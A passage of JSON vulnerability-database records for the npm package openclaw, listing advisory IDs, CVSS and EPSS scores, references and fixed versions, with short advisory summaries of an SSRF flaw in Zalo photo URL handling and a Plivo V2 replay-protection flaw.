                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "CVE-2026-41384",
                "GHSA-vfw7-6rhc-6xxg"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jhah-j2td-t3dp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93303?format=api",
            "vulnerability_id": "VCID-jshg-1pb2-wbak",
            "summary": "OpenClaw validates Zalo outbound photo URLs through the SSRF guard\n## Summary\nZalo outbound photo URLs are now validated through the SSRF guard; affected versions could forward them to the Zalo Bot API without that validation.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nThe Zalo plugin could forward an attacker-controlled outbound photo URL to the Zalo Bot API without first applying OpenClaw's SSRF validation policy.\n\n## Fix\nZalo sendPhoto now parses and validates outbound photo URLs with the shared SSRF hostname policy before posting to Zalo, and media-reply paths route through the guarded outbound media helpers.\n\n## Fix Commit(s)\n- a65eb1b864b7630c1242a82de9e5799b80583c3f\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @foodlook for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44116",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00044",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13839",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00044",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13842",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00048",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1519",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44116"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a65eb1b864b7630c1242a82de9e5799b80583c3f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a65eb1b864b7630c1242a82de9e5799b80583c3f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2hh7-c75g-qj2r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2hh7-c75g-qj2r"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44116",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44116"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-zalo-photo-url-validation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-zalo-photo-url-validation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2hh7-c75g-qj2r",
                    "reference_id": "GHSA-2hh7-c75g-qj2r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2hh7-c75g-qj2r"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"
                }
            ],
            "aliases": [
                "CVE-2026-44116",
                "GHSA-2hh7-c75g-qj2r"
            ],
            "risk_score": 3.9,
            "exploitability": "0.5",
            "weighted_severity": "7.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jshg-1pb2-wbak"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90282?format=api",
            "vulnerability_id": "VCID-jtxm-z4vv-cqg7",
            "summary": "Duplicate Advisory: OpenClaw: Plivo V2 verified replay identity drifts on query-only variants\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-cg6c-q2hx-69h7. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.23 contains a replay identity vulnerability in Plivo V2 signature verification that allows attackers to bypass replay protection by modifying query parameters. The verification path derives replay keys from the full URL including query strings instead of the canonicalized base URL, enabling attackers to mint new verified request keys through unsigned query-only changes to signed requests.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35618",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35618"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-j56c-wpqm-h24x",
                    "reference_id": "GHSA-j56c-wpqm-h24x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-j56c-wpqm-h24x"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110761?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.23",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
